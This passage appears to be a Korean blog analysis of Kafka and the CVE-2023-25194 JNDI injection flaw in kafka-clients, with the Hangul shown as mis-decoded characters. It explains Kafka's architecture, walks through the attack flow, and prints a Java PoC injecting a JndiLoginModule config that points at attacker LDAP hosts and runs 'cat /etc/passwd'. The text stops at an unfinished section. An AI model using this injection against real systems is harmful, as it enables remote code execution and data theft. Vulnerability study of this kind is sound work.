Post

Kafka 1-day analysis

Kafka 1-day analysis

TL;DR

kafka ์ธํ”„๋ผ์— ๋Œ€ํ•œ ๊ณต๊ฒฉ

โ†’ ํŠน์ • ์‚ฌ์šฉ์ž์— ๋Œ€ํ•œ ๊ณต๊ฒฉ์ด ์•„๋‹˜

What is Kafka?

ํ•œ์ค„ ์š”์•ฝ

์„œ๋น„์Šค๋“ค ์‚ฌ์ด์—์„œ ๋ฉ”์‹œ์ง€๋ฅผ ์ฃผ๊ฐ„์— ๋ณด๊ด€ํ•˜๊ณ  ์ „๋‹ฌํ•ด์ฃผ๋Š” ์‹œ์Šคํ…œ

์™œ ํ•„์š”ํ•œ๊ฐ€?

ํ˜„๋Œ€ ์„œ๋น„์Šค๋Š” ํ•˜๋‚˜์˜ ๊ฑฐ๋Œ€ํ•œ ํ”„๋กœ๊ทธ๋žจ์ด ์•„๋‹ˆ๋ผ ์—ฌ๋Ÿฌ ๊ฐœ์˜ ์ž‘์€ ์„œ๋น„์Šค๋กœ ๋‚˜๋‰œ๋‹ค.

์˜ˆ๋ฅผ ๋“ค์–ด์„œ ์ฟ ํŒก์—์„œ ์ฃผ๋ฌธ์„ ํ•˜๋ฉด

1
2
3
4
5
6
์ฃผ๋ฌธ ์„œ๋น„์Šค
๊ฒฐ์ œ ์„œ๋น„์Šค
๋ฐฐ์†ก ์„œ๋น„์Šค
์•Œ๋ฆผ ์„œ๋น„์Šค
ํฌ์ธํŠธ ์„œ๋น„์Šค
...

์ด๋Ÿฐ์‹์œผ๋กœ ์„œ๋น„์Šค๋“ค์ด ์„œ๋กœ ์†Œํ†ตํ•ด์•ผ ํ•œ๋‹ค. ํ•˜์ง€๋งŒ ์ง์ ‘ ์—ฐ๊ฒฐํ•˜๋ฉด ๋ช‡๊ฐ€์ง€ ๋ฌธ์ œ๊ฐ€ ์ƒ๊ธด๋‹ค.

1
2
3
4
์ง์ ‘ ์—ฐ๊ฒฐ์‹œ ๋ฌธ์ œ : 
์ฃผ๋ฌธ ์„œ๋น„์Šค -> ๊ฒฐ์ œ ์„œ๋น„์Šค (๊ฒฐ์ œ ์„œ๋น„์Šค ๋‹ค์šด๋˜๋ฉด ์ฃผ๋ฌธ๋„ ์‹คํŒจ)
์ฃผ๋ฌธ ์„œ๋น„์Šค -> ๋ฐฐ์†ก ์„œ๋น„์Šค (๋ฐฐ์†ก ์„œ๋น„์Šค๊ฐ€ ๋А๋ฆฌ๋ฉด ์ฃผ๋ฌธ๋„ ๋А๋ ค์ง)
์ฃผ๋ฌธ ์„œ๋น„์Šค -> ์•Œ๋ฆผ ์„œ๋น„์Šค (์•Œ๋ฆผ ์„œ๋น„์Šค ์˜ค๋ฅ˜๋‚˜๋ฉด ์ฃผ๋ฌธ๋„ ์˜ค๋ฅ˜๋‚จ)

ํ•˜์ง€๋งŒ ์—ฌ๊ฐ€์„œ Kafka๊ฐ€ ์ค‘๊ฐ„์— ์žˆ๋‹ค๋ฉด

1
2
3
4
5
6
์ฃผ๋ฌธ ์„œ๋น„์Šค -> Kafka -> ๊ฒฐ์ œ ์„œ๋น„์Šค
										-> ๋ฐฐ์†ก ์„œ๋น„์Šค
										-> ์•Œ๋ฆผ ์„œ๋น„์Šค
										
๊ฒฐ์ œ ์„œ๋น„์Šค ๋‹ค์šด๋ผ๋„ -> ๋ฉ”์‹œ์ง€๋Š” Kafka์— ์•ˆ์ „ํ•˜๊ฒŒ ๋ณด๊ด€
๋‚˜์ค‘์— ๋ณต๊ตฌ๋˜๋ฉด -> ๋ฐ€๋ฆฐ ๋ฉ”์‹œ์ง€ ์ฒ˜๋ฆฌ

ํ•ต์‹ฌ ์šฉ์–ด ์ •๋ฆฌ

Producer(์ƒ์‚ฐ์ž)

1
2
๋ฉ”์‹œ์ง€๋ฅผ ๋ณด๋‚ด๋Š” ์ชฝ
ex) ์ฃผ๋ฌธ ์„œ๋น„์Šค๊ฐ€ "์ฃผ๋ฌธ ๋ฐœ์ƒ" ๋ฉ”์‹œ์ง€๋ฅผ Kafka์— ์ „์†กํ•จ

Consumer(์†Œ๋น„์ž)

1
2
๋ฉ”์‹œ์ง€๋ฅผ ๋ฐ›๋Š” ์ชฝ
ex) ๊ฒฐ์ œ/๋ฐฐ์†ก/์•Œ๋ฆผ ์„œ๋น„์Šค๊ฐ€ Kafka์—์„œ ๋ฉ”์‹œ์ง€๋ฅผ ๊บผ๋‚ด์„œ ์ฒ˜๋ฆฌํ•จ

Topic(ํ† ํ”ฝ)

1
2
3
4
5
๋ฉ”์‹œ์ง€๋ฅผ ๋ถ„๋ฅ˜ํ•˜๋Š” ์ฑ„๋„
ex)
"์ฃผ๋ฌธ" ํ† ํ”ฝ -> ์ฃผ๋ฌธ ๊ด€๋ จ ๋ฉ”์‹œ์ง€
"๊ฒฐ์ œ" ํ† ํ”ฝ -> ๊ฒฐ์ œ ๊ด€๋ จ ๋ฉ”์‹œ์ง€
"๋ฐฐ์†ก" ํ† ํ”ฝ -> ๋ฐฐ์†ก ๊ด€๋ จ ๋ฉ”์‹œ์ง€

Broker(๋ธŒ๋กœ์ปค)

1
2
๋ฉ”์‹œ์ง€๋ฅผ ์‹ค์ œ๋กœ ์ €์žฅํ•˜๊ณ  ๊ด€๋ฆฌํ•˜๋Š” ์„œ๋ฒ„
๋ชจ๋“  ๋ฉ”์‹œ์ง€๊ฐ€ Broker๋ฅผ ๊ฑฐ์ณ์„œ ์ด๋™ํ•จ

Kafka Broker ๊ตฌ์กฐ

Broker๋Š” kafka์˜ ์‹ฌ์žฅ์ด๋ผ๊ณ  ํ•  ์ˆ˜ ์žˆ๋‹ค.

1
2
3
4
5
6
7
8
9
10
11
12
Producer
    โ†“ ๋ฉ”์‹œ์ง€ ์ „์†ก
  Broker
  โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”
  โ”‚  Topic: "์ฃผ๋ฌธ"       โ”‚
  โ”‚  [msg1][msg2][msg3] โ”‚  โ† ๋ฉ”์‹œ์ง€๊ฐ€ ์ˆœ์„œ๋Œ€๋กœ ์Œ“์ž„
  โ”‚                     โ”‚
  โ”‚  Topic: "๊ฒฐ์ œ"       โ”‚
  โ”‚  [msg1][msg2]       โ”‚
  โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜
    โ†“ ๋ฉ”์‹œ์ง€ ์ „๋‹ฌ
Consumer

Broker์˜ ์—ญํ• 

1
2
3
4
1. ๋ฉ”์‹œ์ง€ ์ˆ˜์‹  ๋ฐ ์ €์žฅ
2. Consumer์—๊ฒŒ ๋ฉ”์‹œ์ง€ ์ „๋‹ฌ
3. ๋ฉ”์‹œ์ง€ ๋ณต์ œ (์žฅ์•  ๋Œ€๋น„)
4. ์ ‘๊ทผ ์ธ์ฆ ๋ฐ ์ธ๊ฐ€ ์ฒ˜๋ฆฌ <- ๋ฐœํ‘œ์—์„œ ๊ณต๊ฒฉํ–ˆ๋˜ attack surface

Broker์˜ ํŠน์ง•

1
2
3
4
๋ฉ”์‹œ์ง€๋ฅผ ์ฝ์–ด๋„ ์‚ญ์ œ ์•ˆ ํ•จ
-> ์„ค์ •ํ•œ ๊ธฐ๊ฐ„ ๋™์•ˆ ๋ณด๊ด€
-> ๋‚˜์ค‘์— ๋‹ค์‹œ ์ฝ๊ธฐ ๊ฐ€๋Šฅ
-> ์ƒˆ๋กœ์šด Consumer๋„ ๊ณผ๊ฑฐ ๋ฉ”์‹œ์ง€ ์ฝ๊ธฐ ๊ฐ€๋Šฅ

Kafka ์ƒํƒœ๊ณ„ ์ „์ฒด ๊ตฌ์กฐ

Kafka ์ž์ฒด๋งŒ ์žˆ๋Š” ๊ฒŒ ์•„๋‹ˆ๋ผ ์ฃผ๋ณ€์— ๋‹ค์–‘ํ•œ ๋„๊ตฌ๋“ค์ด ์žˆ๋‹ค.

1
2
3
4
5
6
7
8
9
10
์™ธ๋ถ€ ์‹œ์Šคํ…œ
(DB, API...)
     โ†“
Kafka Connect       โ† ์™ธ๋ถ€ ์‹œ์Šคํ…œ๊ณผ Kafka๋ฅผ ์—ฐ๊ฒฐ
     โ†“
Kafka Broker        โ† ํ•ต์‹ฌ, ๋ฉ”์‹œ์ง€ ์ €์žฅ/์ „๋‹ฌ
     โ†“
ksqlDB             โ† Kafka ๋ฐ์ดํ„ฐ๋ฅผ SQL๋กœ ์ฒ˜๋ฆฌ
     โ†“
Consumer ์„œ๋น„์Šค๋“ค

Kafka Connect๋ž€?

1
2
3
4
5
6
์™ธ๋ถ€ ์‹œ์Šคํ…œ <--> Kafka ์—ฐ๊ฒฐ ๋„๊ตฌ
ex)
MySQL DB๊ฐ€ ๋ณ€๊ฒฝ๋˜๋ฉด ์ž๋™์œผ๋กœ Kafka์— ์ „์†กํ•จ
Kafka ๋ฉ”์‹œ์ง€๋ฅผ ์ž๋™์ ์œผ๋กœ Elasticsearch์— ์ €์žฅ

์ง์ ‘ ์ฝ”๋“œ ์•ˆ ์งœ๋„ ์„ค์ •๋งŒ์œผ๋กœ ์—ฐ๊ฒฐ ๊ฐ€๋Šฅ

ksqlDB๋ž€?

1
2
3
4
5
6
7
8
9
Kafka ๋ฐ์ดํ„ฐ๋ฅผ SQL๋กœ ์‹ค์‹œ๊ฐ„ ์ฒ˜๋ฆฌ

์ผ๋ฐ˜ SQL : 
SELECT * FROM orders WHERE amount > 10000
-> ์ €์žฅ๋œ ๋ฐ์ดํ„ฐ์—์„œ ์กฐํšŒ

ksqlDB :
SELECT * FROM orders WHERE amount > 10000
-> ์‹ค์‹œ๊ฐ„์œผ๋กœ ํ˜๋Ÿฌ๋“ค์–ด์˜ค๋Š” ๋ฐ์ดํ„ฐ์—์„œ ์กฐํšŒ

๋ฐœํ‘œ์™€ ํ•ด๋‹น ์ง€์‹๊ณผ์˜ ์—ฐ๊ฒฐ

๋ฐœํ‘œ์ž๋ฃŒ

Kafka cluster and partitions

์œ„์˜ ๋ฐœํ‘œ ์ž๋ฃŒ๋ฅผ ๋ณด๋ฉด ํ•œ ๊ฐ€์ง€ ๋‹ค๋ฅธ ๊ฒƒ์ด ์žˆ๋‹ค. ์œ„์—์„œ๋Š” Kafka cluster, Partition์— ๋Œ€ํ•ด์„œ ์ด์•ผ๊ธฐ ํ•˜์ง€ ์•Š์•˜์ง€๋งŒ ํ•ด๋‹น ๊ทธ๋ฆผ์—๋Š” ํด๋Ÿฌ์Šฝํ„ฐ์™€ ํŒŒํ‹ฐ์…˜์ด ๋‚˜์™€ ์žˆ๋‹ค. โ†’ What is it?

Cluster and partition

์ „์ฒด ํ๋ฆ„

1
2
Producer๋“ค โ†’ Kafka Cluster โ†’ Consumer๋“ค
(๋ฉ”์‹œ์ง€ ์ƒ์„ฑ)  (์ €์žฅ/๊ด€๋ฆฌ)    (๋ฉ”์‹œ์ง€ ์ฒ˜๋ฆฌ)

ํŒŒํ‹ฐ์…˜์ด ๋ญ˜๊นŒ?

ํŒŒํ‹ฐ์…˜์ด๋ž€ Topic์„ ์—ฌ๋Ÿฌ ์กฐ๊ฐ์œผ๋กœ ๋‚˜๋ˆˆ ๊ฒƒ์ด๋‹ค.

1
2
3
4
"์ฃผ๋ฌธ" Topic
โ”œโ”€โ”€ Partition 0: [์ฃผ๋ฌธ1][์ฃผ๋ฌธ4][์ฃผ๋ฌธ7]
โ”œโ”€โ”€ Partition 1: [์ฃผ๋ฌธ2][์ฃผ๋ฌธ5][์ฃผ๋ฌธ8]
โ””โ”€โ”€ Partition 2: [์ฃผ๋ฌธ3][์ฃผ๋ฌธ6][์ฃผ๋ฌธ9]

์œ„์˜ ์„ค๋ช…๋งŒ ๋“ค์œผ๋ฉด ์ž˜ ์ดํ•ด๊ฐ€ ๋˜์ง€ ์•Š๋Š”๋ฐ, ์ž์„ธํ•˜๊ฒŒ ์„ค๋ช…ํ•˜์ž๋ฉด โ†’ ์™œ ๋‚˜๋ˆ„๋Š”๊ฐ€?

1
2
3
4
5
6
7
8
9
Partition์ด 1๊ฐœ๋ฉด
-> ๋ชจ๋“  ๋ฉ”์‹œ์ง€๋ฅผ ์ˆœ์„œ๋Œ€๋กœ ํ•˜๋‚˜์”ฉ ์ฒ˜๋ฆฌํ•จ
-> consumer 1๊ฐœ๋งŒ ๋ถ™์„ ์ˆ˜ ์žˆ์Œ
-> ๋А๋ฆผ

Partition์ด 3๊ฐœ๋ฉด
-> Consumer 3๊ฐœ๊ฐ€ ๊ฐ๊ฐ ๋‹ด๋‹น
-> 3๋ฐฐ ๋น ๋ฆ„
-> ๋ณ‘๋ ฌ ์ฒ˜๋ฆฌ ๊ฐ€๋Šฅ

๋” ์‰ฝ๊ฒŒ ๊ฐ„๋‹จํ•œ ์˜ˆ์‹œ๋ฅผ ๋“ค์–ด์„œ ์„ค๋ช…ํ•˜์ž๋ฉด :

๋งˆํŠธ์— ๊ณ„์‚ฐ๋Œ€๊ฐ€ ํ•˜๋‚˜๋ผ๋ฉด ? โ†’ 100๋ช…์ด ํ•˜๋‚˜์˜ ๊ณ„์‚ฐ๋Œ€์—์„œ ์ค„์„ ์„ฌ โ†’ ๋А๋ฆผ

๋งˆํŠธ์— ๊ณ„์‚ฐ๋Œ€๊ฐ€ 3๊ฐœ๋ผ๋ฉด โ†’ 100๋ช…์ด 3๊ฐœ์˜ ๊ณ„์‚ฐ๋Œ€์— ๋‚˜๋ˆ ์„œ ์ค„์„ ์„ฌ โ†’ ๋น ๋ฆ„

๊ทธ๋Ÿผ Broker๋Š” ์–ด๋””์—?

์ด ๊ทธ๋ฆผ์—์„œ Kafka Cluster = Broker๋“ค์˜ ๋ฌถ์Œ์ด๋‹ค.

1
2
3
4
Kafka Cluster
โ”œโ”€โ”€ Broker 1 (์„œ๋ฒ„ 1) โ†’ Partition๋“ค ๋‹ด๋‹น
โ”œโ”€โ”€ Broker 2 (์„œ๋ฒ„ 2) โ†’ Partition๋“ค ๋‹ด๋‹น
โ””โ”€โ”€ Broker 3 (์„œ๋ฒ„ 3) โ†’ Partition๋“ค ๋‹ด๋‹น

์ฆ‰ broker๊ฐ€ ์—ฌ๋Ÿฌ ๋Œ€๊ฐ€ ๋ชจ์—ฌ์„œ Cluster๋ฅผ ๊ตฌ์„ฑํ•œ๋‹ค.

CVE-2023-25194

Kafka clients ecosystem

์ผ๋‹จ ์ด ์‚ฌ์ง„๋ถ€ํ„ฐ ์ดํ•ด๋ฅผ ํ•ด๋ณด์ž. ํ•ด๋‹น ์‚ฌ์ง„์€ Kafka clients ๋ผ์ด๋ธŒ๋Ÿฌ๋ฆฌ๋ฅผ ์‚ฌ์šฉํ•˜๋Š” ๊ฒƒ๋“ค์ด๋‹ค.

kafka-clients๋ž€ ๋ฌด์—‡์ผ๊นŒ?

kafka์— ์—ฐ๊ฒฐํ•  ๋•Œ ์‚ฌ์šฉํ•˜๋Š” java ๋ผ์ด๋ธŒ๋Ÿฌ๋ฆฌ์ด๋‹ค. ์ฆ‰, kafka์™€ ํ†ต์‹ ํ•˜๋ฉด ์ด ๋ผ์ด๋ธŒ๋Ÿฌ๋ฆฌ๋ฅผ ๋ฐ˜๋“œ์‹œ ์จ์•ผํ•œ๋‹ค.

โ†’ cve-2023-25194์˜ ์ทจ์•ฝ์ ์ด ์ด ๋ผ์ด๋ธŒ๋Ÿฌ๋ฆฌ ์•ˆ์— ์žˆ๋‹ค.

๊ทธ๋ž˜์„œ ์ด ๊ทธ๋ฆผ์ด ๋งํ•˜๋Š” ๊ฒƒ์€

1
2
3
Kafka-Clients ๋ผ์ด๋ธŒ๋Ÿฌ๋ฆฌ ์‚ฌ์šฉ -> ์ทจ์•ฝ์ ๋„ ๊ฐ™์ด ํฌํ•จ๋จ
kafka connect -> kafka clients ์‚ฌ์šฉ -> ์ทจ์•ฝ์  ํฌํ•จ
Druid -> kafka-clients ์‚ฌ์šฉ -> ์ทจ์•ฝ์  ํฌํ•จ

๊ทธ๋Ÿผ Druid๋Š” ๋ฌด์—‡์ผ๊นŒ?

1
2
3
4
Apache Druid = ์‹ค์‹œ๊ฐ„ ๋ฐ์ดํ„ฐ ๋ถ„์„ DB
์‹ค์‹œ๊ฐ„ ๋ถ„์„์— ํŠนํ™”๋œ DB
kafka์—์„œ ๋ฐ์ดํ„ฐ๋ฅผ ๋ฐ›์•„์„œ ๋ถ„์„ํ•œ๋‹ค. -> ๊ทธ๋ž˜์„œ kafka-clients ์‚ฌ์šฉํ•จ

์ทจ์•ฝ์  ํ•œ์ค„ ์š”์•ฝ

Kafka ์—ฐ๊ฒฐ ์„ค์ •์„ ๊ณต๊ฒฉ์ž๊ฐ€ ์กฐ์ž‘ํ•  ์ˆ˜ ์žˆ์œผ๋ฉด, ์ธ์ฆ ๊ณผ์ •์—์„œ ์•…์„ฑ ์ฝ”๋“œ๊ฐ€ ์‹คํ–‰๋œ๋‹ค.

SASL์ด๋ž€?

์ผ๋‹จ ํ•ด๋‹น ์ทจ์•ฝ์ ์„ ๋ถ„์„ํ•˜๊ธฐ ์ „์— SASLl์ด๋ผ๋Š” ๊ฑฐ์— ๋Œ€ํ•ด์„œ ์•Œ์•„์•ผ ํ•œ๋‹ค. Kafka์— ์—ฐ๊ฒฐ ํ•  ๋•Œ ์ธ์ฆ์ด ํ•„์š”ํ•˜๋‹ค. ํ—ˆ๊ฐ€๋œ ํด๋ผ์ด์–ธํŠธ๋งŒ Kafka์— ์ ‘์†์ด ๊ฐ€๋Šฅํ•˜๋‹ค.

โ†’ ์ด๋ฅผ ์ธ์ฆํ•˜๋Š” ๋ฐฉ์‹ ์ค‘ ํ•˜๋‚˜๊ฐ€ SASL์ด๋‹ค.

JAAS๋ž€?

ํ•œ ๊ฐ€์ง€ ๋” ์•Œ์•„์•ผ ํ•˜๋Š” ์ง€์‹ ์ค‘ ํ•˜๋‚˜๊ฐ€ JAAS์ด๋‹ค. JAAS ๋Š” SASL ์ธ์ฆ์„ JAVA ์—์„œ ๊ตฌํ˜„ํ•˜๋Š” ํ”„๋ ˆ์ž„์›Œํฌ์ด๋‹ค.

1
2
3
4
5
6
์„ค์ • ํŒŒ์ผ์— ์ด๋ ‡๊ฒŒ ์”€:

sasl.jaas.config =
    [LoginModule ์ด๋ฆ„] required
    username="admin"
    password="1234";

์—ฌ๊ธฐ์„œ LoginModule = ์‹ค์ œ ์ธ์ฆ์„ ๋‹ด๋‹นํ•˜๋Š” ์ฝ”๋“œ

์ด๋Ÿฌํ•œ ๋ชจ๋“ˆ ์ข…๋ฅ˜์—๋Š” ์—ฌ๋Ÿฌ๊ฐ€์ง€๊ฐ€ ์žˆ๋‹ค.

1
2
3
PlainLoginModule -> ์ผ๋ฐ˜ username/password ์ธ์ฆ
JndiLoginModule -> JNDI ์„œ๋น„์Šค ํ†ตํ•ด ์ธ์ฆ <- ๋ฌธ์ œ์˜ ๋ชจ๋“ˆ
LdapLoginModule -> LDAP ์„œ๋ฒ„ ํ†ตํ•ด ์ธ์ฆ

JNDI๋ž€?

JNDI = Java Naming and Directory Interface โ†’ ์‰ฝ๊ฒŒ ๋งํ•˜๋ฉด ์ž๋ฐ”์˜ ์ฃผ์†Œ๋ก์ด๋ผ๊ณ  ํ•  ์ˆ˜ ์žˆ๋‹ค.

1
2
3
4
"user123 ๊ฐ์ฒด๊ฐ€ ์–ด๋””์žˆ์ง€?"
-> jndi ์„œ๋ฒ„์— ์งˆ์˜
-> "ldap://server.com/user123์— ์žˆ๋‹ค"
-> ๊ฑฐ๊ธฐ์„œ ๊ฐ€์ ธ์™€์„œ ์‹คํ–‰

์—ฌ๊ธฐ์„œ ๋ฌธ์ œ๊ฐ€ ๋ฐœ์ƒํ•œ๋‹ค.

1
2
3
4
5
6
JNDI ์„œ๋ฒ„์—์„œ ๊ฐ€์ ธ์˜จ ๋ฐ์ดํ„ฐ๋ฅผ ๊ทธ๋Œ€๋กœ ์‹คํ–‰ํ•ด๋ฒ„๋ฆฌ๋Š” ๋กœ์ง์ด ์กด์žฌํ•œ๋‹ค.

JNDI ์„œ๋ฒ„๊ฐ€ ์•…์„ฑ Java ์ฝ”๋“œ๋ฅผ ๋ฐ˜ํ™˜ํ•˜๋ฉด?
-> ๊ทธ๋ƒฅ ์‹คํ–‰
-> ๊ณต๊ฒฉ์ž ์ฝ”๋“œ๊ฐ€ ํ”ผํ•ด์ž ์„œ๋ฒ„์—์„œ ์‹คํ–‰
-> RCE ๋‹ฌ์„ฑ

Attack Flow

๊ณต๊ฒฉ์ž๊ฐ€ Kafka ์—ฐ๊ฒฐ ์„ค์ •์„ ์กฐ์ž‘ํ•  ์ˆ˜ ์žˆ๋Š” ์ƒํ™ฉ์ด๋ผ๋ฉด

  1. ๊ณต๊ฒฉ์ž๊ฐ€ ์•…์„ฑ sasl.jaas.config ์ฃผ์ž…
1
2
3
sasl.jaas.config =
       com.sun.security.auth.module.JndiLoginModule required
       user.provider.url="ldap://attacker.com/exploit";
  1. kafka client ์ดˆ๊ธฐํ™” ์‹œ์ž‘
  2. ์ฝ”๋“œ ์‹คํ–‰ ํ๋ฆ„ :

KafkaConsumer ์ƒ์„ฑ

โ†’ ์ฑ„๋„ ๋นŒ๋” ์ƒ์„ฑ

โ†’ SASL ์ฑ„๋„ ์„ค์ •

โ†’ LoginContext.login() ํ˜ธ์ถœ

โ†’ JndiLoginModule.login() ํ˜ธ์ถœ

โ†’ InitialContext.lookup(โ€ldap://attacker.com/exploitโ€)

  1. ๊ณต๊ฒฉ์ž ์„œ๋ฒ„์— ์•…์„ฑ java ๊ฐ์ฒด ๋ฐ˜ํ™˜
  2. ํ”ผํ•ด์ž ์„œ๋ฒ„์—์„œ ์•…์„ฑ ์ฝ”๋“œ ์‹คํ–‰

โ†’ RCE

๋ฐœํ‘œ์ž๋ฃŒ์˜ attack flow

๋ฐœํ‘œ์ž๋ฃŒ์˜ attack flow

  1. set up

๊ณต๊ฒฉ์ž๊ฐ€ Evil JNDI Server๋ฅผ ๋ฏธ๋ฆฌ ์ค€๋น„(์•…์„ฑ ์ฝ”๋“œ๋ฅผ ๋ฐ˜ํ™˜ํ•  ์„œ๋ฒ„ ์„ธํŒ…)

  1. connection string

๊ณต๊ฒฉ์ž๊ฐ€ Kafka Client์— ์•…์„ฑ sasl.jaas.config ์ฃผ์ž…(ldap://evil-jndi-server/exploit)

  1. lookup

kafka client๊ฐ€ JndiLoginModule ์‹คํ–‰ โ†’ Evil JNDI Server์— lookup ์š”์ฒญ

โ€œ์ด ์ฃผ์†Œ์— ์žˆ๋Š” ๊ฐ์ฒด ์ค˜โ€ โ†’ ์ด๋ ‡๊ฒŒ ์งˆ์˜

  1. payload

evil jndi server๊ฐ€ ์•…์„ฑ ์ž๋ฐ” ์ฝ”๋“œ(payload)๋ฅผ ๋ฐ˜ํ™˜ํ•จ

  1. taken over

kafka client๊ฐ€ ์•…์„ฑ ์ฝ”๋“œ๋ฅผ ์‹คํ–‰ โ†’ ๊ณต๊ฒฉ์ž๊ฐ€ kafka client ์„œ๋ฒ„ ์žฅ์•… โ†’ RCE

Normal reqeust

kafka client์— ์ ‘๊ทผํ•˜๊ธฐ ์œ„ํ•ด์„œ๋Š”

1
2
3
4
properties.put("sasl.jaas.config", 
    "org.apache.kafka.common.security.plain.PlainLoginModule required\n" +
    "username=\"admin\"\n" +
    "password=\"1234\";");

์ด๋Ÿฐ์‹์œผ๋กœ ๊ฐœ๋ฐœ์ž๊ฐ€ ์ ‘๊ทผํ•  ์ˆ˜ ์žˆ๋‹ค. ์ •์ƒ์ ์ธ ํ๋ฆ„์€ ์•„๋ž˜์™€ ๊ฐ™๋‹ค.

1
2
3
๊ฐœ๋ฐœ์ž๊ฐ€ ์„ค์ •
sasl.jaas.config = PlainLoginModule + admin/1234
-> KafaConsumer ์ƒ์„ฑ -> PlainLoginModule ์‹คํ–‰ -> ์ •์ƒ ์ธ์ฆ ์™„๋ฃŒ

Evil Request

Kafka client์— ์ ‘๊ทผํ•  ๋•Œ ์•„๋ž˜์™€ ๊ฐ™์€ ์š”์ฒญ์„ ๋ณด๋‚ธ๋‹ค.

1
2
3
properties.put("com.sun.security.auth.module.JndiLoginModule required\n" +
    "user.provider.url=" +
    "\"ldap://localhost/hhylKPnySW/Plain/Exec/eyJjbWQ...\"\n");

์ด๋ ‡๊ฒŒ ์•…์˜์ ์ธ sasl.jaas.config๋ฅผ ์ฃผ์ž…ํ•˜๋ฉด

1
2
3
4
5
6
7
8
9
10
11
12
๊ณต๊ฒฉ ํ๋ฆ„:

๊ณต๊ฒฉ์ž๊ฐ€ ์„ค์ • ์ฃผ์ž…
sasl.jaas.config = JndiLoginModule + ldap://attacker.com
        โ†“
KafkaConsumer ์ƒ์„ฑ
        โ†“
JndiLoginModule ์‹คํ–‰
        โ†“
๊ณต๊ฒฉ์ž ์„œ๋ฒ„์— lookup
        โ†“
์•…์„ฑ ์ฝ”๋“œ ์‹คํ–‰ โ†’ RCE

์œ„์™€ ๊ฐ™์€ ์ฒด์ธ์œผ๋กœ RCE๊ฐ€ ๊ฐ€๋Šฅํ•˜๋‹ค

PoC

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
// 1~2๋ฒˆ: Kafka ์—ฐ๊ฒฐ ์„ค์ • ๊ฐ์ฒด ์ƒ์„ฑ
Properties properties = new Properties();

// 3๋ฒˆ: ์—ฐ๊ฒฐํ•  Kafka Broker ์ฃผ์†Œ
properties.put("bootstrap.servers", "127.0.0.1:1234");

// 4~6๋ฒˆ: ๋ฉ”์‹œ์ง€ ์—ญ์ง๋ ฌํ™” ๋ฐฉ์‹
properties.put("key.deserializer", deserializer);
properties.put("value.deserializer", deserializer);

// 7๋ฒˆ: ์ธ์ฆ ๋ฐฉ์‹ = PLAIN
properties.put("sasl.mechanism", "PLAIN");

// 8๋ฒˆ: ๋ณด์•ˆ ํ”„๋กœํ† ์ฝœ = SSL ์‚ฌ์šฉ
properties.put("security.protocol", "SASL_SSL");

// 9~13๋ฒˆ: โ† attacker-controlled -> evil jaas inject
// JndiLoginModule ์‚ฌ์šฉ + ์•…์„ฑ LDAP ์ฃผ์†Œ ์ง€์ •
String jaasConfig = 
    "com.sun.security.auth.module.JndiLoginModule required\n" +
    "user.provider.url=" +
    "\"ldap://localhost/hhylKPnySW/Plain/Exec/eyJjbWQ...\"\n"

// 14๋ฒˆ: ์•…์„ฑ ์„ค์ •์„ properties์— ๋„ฃ์Œ
properties.put("sasl.jaas.config", jaasConfig);

// 15๋ฒˆ: โ† ์—ฌ๊ธฐ์„œ ํ„ฐ์ง!
// KafkaConsumer ์ƒ์„ฑํ•˜๋Š” ์ˆœ๊ฐ„ JAAS ์„ค์ • ์ฝ๊ณ  RCE ๋ฐœ์ƒ
KafkaConsumer kafkaConsumer = new KafkaConsumer<>(properties);

โ†’ kafka client์— ์ฃผ์ž…ํ•  ๊ณต๊ฒฉ ์ฝ”๋“œ

attacker-controlled ๋ถ€๋ถ„์„ ์ œ์™ธํ•˜๊ณ  ๋‹ค๋ฅธ ๋ถ€๋ถ„์€ ๊ทธ๋ƒฅ ๊ณ ์ • ๊ฐ’์ด๋‹ค. ๋‹จ์ˆœํžˆ kafka ์—ฐ๊ฒฐ์— ํ•„์š”ํ•œ ํ‘œ์ค€ ์ฝ”๋“œ์ด๊ธฐ ๋•Œ๋ฌธ์— ๋ณ„๋กœ ์ค‘์š”ํ•˜์ง€ ์•Š๋‹ค. ํ•ต์‹ฌ์€ ์•„๋ž˜์˜ ์ฝ”๋“œ์ด๋‹ค.

1
2
3
4
5
6
7
String jaasConfig = 
    "com.sun.security.auth.module.JndiLoginModule required\n" +
    "user.provider.url=" +
    "\"ldap://localhost/hhylKPnySW/Plain/Exec/eyJjbWQ...\"\n"

<base64 decode>
{"cmd":"cat /etc/passwd"}

์ด ์ฝ”๋“œ๊ฐ€ ์ œ์ผ ์ค‘์š”ํ•œ connection string์ด๋‹ค.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
15๋ฒˆ ์ค„: KafkaConsumer ์ƒ์„ฑ
    โ†“
KafkaConsumer.<init>         โ† ์ƒ์„ฑ์ž ํ˜ธ์ถœ
    โ†“
ClientUtils.createChannelBuilder    โ† ์ฑ„๋„ ์ƒ์„ฑ
    โ†“
ChannelBuilders.clientChannelBuilder โ† ์ฑ„๋„ ์„ค์ •
    โ†“
SaslChannelBuilder.configure         โ† SASL ์ธ์ฆ ์„ค์ •
    โ†“
...
    โ†“
LoginContext.login                   โ† ๋กœ๊ทธ์ธ ์‹œ์ž‘
    โ†“
JNDILoginModule.login                โ† ์—ฌ๊ธฐ์„œ JNDI lookup ๋ฐœ์ƒ!

์ฝ”๋“œ๋Š” ์œ„์™€ ๊ฐ™์€ ํ๋ฆ„์œผ๋กœ ์‹คํ–‰๋œ๋‹ค.

๊ฐœ๋ฐœ์ž๊ฐ€ ์˜๋„ํ•œ ๊ฒƒ์€ kafka consumer๋ฅผ ๋งŒ๋“œ๋Š” ๊ฒƒ์ด์ง€๋งŒ ๋‚ด๋ถ€์ ์œผ๋กœ ์œ„์˜ ์ฒด์ธ์ด ์‹คํ–‰๋˜๋ฉด์„œ JndiLoginModule์ด ํ˜ธ์ถœ๋œ๋‹ค. โ†’ RCE ํŠธ๋ฆฌ๊ฑฐ

๊ทธ๋ ‡๋‹ค๋ฉด LoginContext.login ๋‚ด๋ถ€์—์„œ๋Š” ์–ด๋–ป๊ฒŒ ๋™์ž‘ํ• ๊นŒ?

LoginContext login flow

